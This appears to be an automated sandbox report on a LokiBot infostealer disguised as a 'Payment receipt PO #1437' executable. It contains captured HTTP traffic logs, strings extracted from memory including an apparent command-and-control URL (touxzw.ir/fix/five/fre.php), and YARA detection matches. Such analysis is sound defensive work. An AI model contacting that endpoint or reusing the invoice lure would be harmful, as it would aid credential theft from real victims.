Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbbVeSLGjX%2FyjAM7hGC7B0Kk%2F2cIfENGVbaYq4pEa8%2Bv7WmcUCie4Kp674FyK7TgRrQmmFaEV9EcP1fdyzoWw81AI1vXccomTEugHVN4bcoCYS7rbyxIpUdp%2B0M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba406e8e7842e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1613&rtt_var=806&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3L7gcEVHa%2FcEz8pM6i7rkbku3eFOfWuumQO5P%2Fy1EaLv%2FlaKLHonWLyrDwW0UwsXSaxRhA%2B8F3cjZvp%2BvGqM5JDyzNgOM6IIZ6E9HgewDF%2BzUn3%2F0l4M3PuCF4c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40788b2f8ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1911&rtt_var=955&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MEn1%2BgZBx0NaX5khiokTH%2FMzg84PPocC164axlBdyzvSO3xZlPsihY%2FvwVVABYEB69brHLdUIOJZBsins4ATYGuOqlT%2F%2Ff%2Fq0WvCvtQJXAVjUvFBvytJo398dpU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba407d9bcbc358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1612&rtt_var=806&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqxZEkWiMg4HukyF%2FpTG50ZOoUwhx3s4SVc%2B2hsm%2BQN1zRGaaYdsm3aM6G2cS0mCt6CYtJHLNLAIC%2FRape4hVKsEZY6o8VguvdhXcgfxotR796e3qcKD%2Bj0AZYU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40828ba214a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2093&min_rtt=2093&rtt_var=1046&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rxHP5xv327vcR6hmggjg%2F7xK6Qp4atKBmRxqwkSfALSIswm%2BdY34xBsXXKy2Mu16dM1zTd05Oq8IIKFr8P89qgU14ffWavJmKQcifaNSkWG9v25O%2F4IjOQceqQg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40884cd6de95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apVZ%2B6DiO4XGLEr%2FTh7qVdezLmQ1zqZ6fCvIyFBV9x5DpKqZ%2B7oipNj146%2BtSPf8gr4%2FvsYrLVVZOueK5ZngVOgtp8%2FjUgxDS3YwhXvD6qHqLOJVgDMCLQhZmhM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba408e2fa914a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=2068&rtt_var=1034&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hv6miSbflD23khyyP9fqU2RsffCAezPvYICNojgEr%2BErLIYqXiTul3PEOCQaHTsYUjCYl53BetZKbVi6jhSlPEhLHK4MDi%2Fl3lN0imw8i7g9LnkLgOT%2BVwlCpbo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba4099ca41c358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=908&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WKQOFrA1WQHiQOLvNddYPKRp5Tz8y56D7JhKu1GQ0oQISCgC6yCLQJ3X12Mrau8xkK%2BlZ3Az1Q2yeqNS71Y%2F4rACl8SpzA0Tln5qdF7fCWxVnhpbzooPi4sLOE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40a45e728ae3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2039&min_rtt=2039&rtt_var=1019&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nHmNgbKj2bW5mirZ%2FfWG2goobMB%2BvHpcb%2BCSYfGJ%2FStWnIwIeWAJoNQw0yRXM2Gqr0fsMFL8PAE3VCvXzUSy6fof%2FFo%2BEVwpfSJ6Vx0QKa3cn86vhxwdw8R5zM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40afee948ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1874&min_rtt=1874&rtt_var=937&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jQnZYpwkbQ1PB10BZk9lwmy235aVn6Yf%2FYU6Eed%2FezOB%2Bm0bhswCbXl2DAC0xS%2B9GKD15ccARoZomkkM26M3ejYD7HlSSYcYaI0qy0LQ75UJ6x%2FWgAqLn0fjkc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40b679428ae3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2082&min_rtt=2082&rtt_var=1041&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a2jBKLi7rpdZXBXArekXsqpmV3wpfyipbG0GVCn7jFKU3RpTUK8OnZh5IrhFIpP%2B4F1sFa%2BFzM2XTbnRzZuA6C3lLvDFg4l%2Bp0wReeWvFngf241s9MUVmPI%2FUW8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40bb9a9c14a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2016&min_rtt=2016&rtt_var=1008&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DUkATTXa4Z2HjB4XTLaPfa9nhWXLshDt2YFpDhEMpOnJbtfEBLGjlUCgUsRimd1inyNqdtv0prZ8nxKppvhEloyrGxlVl0bSC35SC9PcJFnhWENOqvDhYPAyZU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40c078408ae3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2147&min_rtt=2147&rtt_var=1073&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUZMhD3000BdD8WqTADNNdlniBxK%2B1Pa3yaxp41ar7W%2FqiuJWueEHv3RuO32KslvzK72Ff7%2BaPV0By%2Fm84kWpWFQnSH9RcK7Iq9oXX2sTSumg8DVRPJLKm3wwZY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40cb2fe58ae3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KB8hmv4gxfl6zgmnvAMwsiQ3q%2FlUoj3M4LkOxWHwgNHm2yt6sS6tXKfGO78P3dQJd9fz%2BkYO%2FD6f2YC3iCc7nphIBZ7i5hktyYsVfUjiwZD30%2Fysk3mqCnE7iJ0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40d7891b7c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=43025&min_rtt=43025&rtt_var=21512&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xRq4ER8mInMElsypscbe3ToKxQA1qR58HmrJwShJAflPYgwQK6Dqci%2BM6VfqeNn5foI6iq8b0a7IZVIwAXWnhBFYi2fixG2CblCD5bIckM6OuDUXIVbx%2FR8xJjI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40dd7a9542e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1785&rtt_var=892&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3e7eQnQNP6Fp5kd9UcM2wjhFwM4EcQopfBKeyNsOTPqKrOY22l8J7NeFkJ2gmNtorwANaB1eNAyiCY5d5dHLBjqcTEV7bBYp1J5h719jrIFmlssRIY4v9rPL2AM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40e27d5ade95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vU1EfzImouDOWhgLWnItmSBknb35%2Fs7KPdOC%2BMi6RHfpPJssKdKMAx1UzuOJXrLdsUUN1q4SPqf8RPKanV68rvlIiRAIqmIVexe4JaD6yli3uJg5c29Ao2v%2FoJI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40ed6fda8ae3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2052&min_rtt=2052&rtt_var=1026&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZGw%2FTe%2B47u3DtkND0dzNqXihqFyKubJjsRKPv9XfVCTujJIgtnOOgta5EkBgwNZNh%2Bveg%2BnXO%2BqsNq4kq3vlp468BFgfQre0zPBQBXM7UmFagGRuA5d0Z4bT00%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40f25e298ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1905&min_rtt=1905&rtt_var=952&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pg06ag5cB4IUSKRu0oYndVInUKNmos88ZgIVeVD%2F5Zy5KjjD6NFfSXs83kcdxrl6bEADIznIJ7DkBDfTN4KLrsH7suoGqh5bFDsJwi6wG7PIzHvvf12KsOmKy9U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40f848bcde95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hnm9idr5OiM%2FZunb2PXCAoLjsk0b%2BNBBNCYmW5YvxGu9oVxDITtfYegEHh%2FgB9hISl9CzyPy8ZtqM4raUMP%2FYM2FWO1SUp7xdTFeCpK0%2BbbmOo1Hjtyboc3V4yQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba410959214414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hooSQTSSxuYUGJDXmsDkViLVbmhQC1L2l%2BhN2wonPjkhPIfMox9qnWylGm%2BOhJi9AWcqOCrAUfCO1%2BaDqrUGGjJqJDhGcdFXtDFNUXXG7vTj0eS6kYrjjC7DFs4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba410f2f5b8ae3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2017&min_rtt=2017&rtt_var=1008&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kDMVlS%2BIF8KvjN33U%2FRABDZIafcmAJcC92f9ZPIwMydtUFy9XkXs2ICT0suE93GPdfJFS1lM4zTBjaONuHPUhfo0WjT3jBubzy3jEhPHwNaeC%2FLhvwMOFouOo%2Bk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba4114bde47c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1909&min_rtt=1909&rtt_var=954&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 00000001.00000002.2228686790.0000000002961000.00000004.00000800.00020000.00000000.sdmp, euKeoTytdT.exe, 0000000B.00000002.2286478638.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, 0000000A.00000002.3429388414.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://touxzw.ir/fix/five/fre.php
Source: euKeoTytdT.exe, euKeoTytdT.exe, 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
